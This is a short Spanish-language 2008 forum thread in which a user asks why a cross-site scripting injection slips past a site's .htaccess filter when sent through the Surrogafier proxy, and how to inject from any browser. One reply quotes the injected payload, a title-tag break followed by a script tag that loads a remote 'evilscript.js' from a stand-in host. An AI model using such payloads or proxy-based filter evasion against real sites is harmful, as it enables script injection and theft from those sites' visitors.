elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.
 
Inicio Ayuda Buscar Ingresar Registrarse
25 Mayo 2012, 12:28  


Tema destacado: Nueva página de elhacker.net en Google+ Google+

+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Bugs y Exploits (Moderador: berz3k)
| | |-+  Filtros y Surrogafier, vectores no detectados
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: Filtros y Surrogafier, vectores no detectados  (Leído 3,059 veces)
I_xtr3m3_I

Desconectado Desconectado

Mensajes: 5


Ver Perfil
Filtros y Surrogafier, vectores no detectados
« en: 28 Mayo 2008, 06:09 »

Al ineyectar el script desde firefox, el sitio me manda error, es por que lo bloquea desde el httacces, usando el Surrogafier, no solo no me manda error 403 de denegación de acceso, sino que logro inyectar el script...

Tienen idea  de por que pasa? Y como puedo inyectar el script desde cualquier navegador?
« Última modificación: 12 Agosto 2008, 16:38 por sirdarckcat » En línea
yeikos


Desconectado Desconectado

Mensajes: 1.424



Ver Perfil
Re: Duda XSS
« Respuesta #1 en: 28 Mayo 2008, 20:24 »

Inyecta el código, obtén el código fuente de la página resultante, o por lo menos el fragmento donde éste aparece, y escribelo aquí mismo.
En línea
I_xtr3m3_I

Desconectado Desconectado

Mensajes: 5


Ver Perfil
Re: Duda XSS
« Respuesta #2 en: 29 Mayo 2008, 21:59 »

Con el Surrogafier, solo pone el codigo inyectado:

</TITLE><script src="http://server.com/evilscript.js"></script>

Si meto scripts bloqueados desde httacces, con IE o Firefox u Opera, manda este error:


Not Acceptable
An appropriate representation of the requested resource /id.php could not be found on this server.

Apache/1.3.39 Server at sitio.com Port 80

 y con los scripts que no filtra, aparece en blanco el codigo fuente.

En línea
Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
[URG]Detectados equipos infectados por Kelihos.B
Seguridad
erawlam 1 230 Último mensaje 11 Abril 2012, 14:32
por rembolso
Powered by SMF 1.1.16 | SMF © 2006-2008, Simple Machines